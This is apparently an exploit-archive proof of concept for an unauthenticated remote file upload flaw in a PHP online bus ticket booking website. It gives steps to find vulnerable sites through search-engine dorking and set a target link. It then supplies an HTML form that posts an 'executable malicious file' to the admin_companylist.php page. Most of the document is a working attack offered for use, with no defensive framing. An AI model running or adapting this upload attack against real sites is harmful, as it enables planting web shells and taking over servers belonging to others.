=============================================================================================================================================
| # Title     : online bus ticket booking Website v1.0 Remote File Upload Vulnerability                                                     |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_online-bus-ticket-booking-.zip           |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 11.

[+] Set the target site link Save changes and apply . 

[+] save code as poc.html .

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Company Form</title>
</head>
<body>

    <!-- Form for company details -->
    <form name="" action="http://127.0.0.1/online-bus-ticket-booking-Website/admin_companylist.php" method="POST" enctype="multipart/form-data">
        
        <!-- File input for logo -->
        <label for="logo">Company Logo:</label>
        <input type="file" id="logo" name="logo">
        <br>

        <!-- Submit button for update -->
        <input type="submit" name="update" value="Update">
        
    </form>

</body>
</html>


Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================